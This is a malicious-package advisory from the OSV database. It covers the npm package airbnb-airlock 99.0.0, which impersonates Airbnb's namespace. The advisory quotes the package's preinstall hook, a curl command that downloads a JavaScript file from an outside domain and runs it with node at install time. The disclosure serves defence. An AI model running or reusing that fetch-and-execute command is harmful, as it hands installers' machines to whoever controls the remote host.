MAL-2026-6293

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/airbnb-airlock/MAL-2026-6293.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6293
Published
2026-06-23T14:11:48Z
Modified
2026-06-23T14:31:21.093109907Z
Summary
Malicious code in airbnb-airlock (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (034fd98a2ccd98f2bec2201d130c5a102ad17907c37af34b5162592e26a0fd43)

The package's preinstall lifecycle hook in package.json runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js, fetching an unpinned JavaScript file from poc.amanrawat.com and immediately executing it with node during npm install. The fetched content is mutable and entirely controlled by the operator of that domain — installers run whatever bytes are served at install time, with no hash or signature verification. The package ships no other functional content; the remote fetch-and-execute is its only behavior. The package name uses the 'airbnb-' prefix to impersonate the Airbnb open-source namespace while being published by an unrelated author with a placeholder description ('Test') and an inflated version (99.0.0), consistent with namespace impersonation intended to lure installers searching for Airbnb tooling.

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "034fd98a2ccd98f2bec2201d130c5a102ad17907c37af34b5162592e26a0fd43",
            "id": "IN-MAL-2026-007205",
            "source": "amazon-inspector",
            "modified_time": "2026-06-23T14:11:48Z",
            "versions": [
                "99.0.0"
            ],
            "import_time": "2026-06-23T14:23:03.286857051Z"
        }
    ]
}
References
Credits

Affected packages

npm / airbnb-airlock

Package

Affected ranges

Affected versions

99.*
99.0.0

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/airbnb-airlock/MAL-2026-6293.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "tlsh": "76e026348920107719c402d28c3aa40bd6c24e3b0104380d939b042cd0de93798fe31e",
            "sha256": "be1334c8fea52b8780ac6d2e4c9db381366d62eeab8190fbaf53ddc21788eae7",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "airbnb-airlock-99.0.0.tgz",
            "hashes": {
                "sha1": "f5300e734c06a9de2a18a7b544cc33a212f87f96",
                "sha512_sri": "sha512-YrHSLJsTMwrg7t1Cyq32Si11kk9JcE5yTcoPiAPRs+DS/Dg8tFhOCu7ytOrhfptGgu6xbtujJHmp/c9llNGaTw=="
            }
        }
    ]
}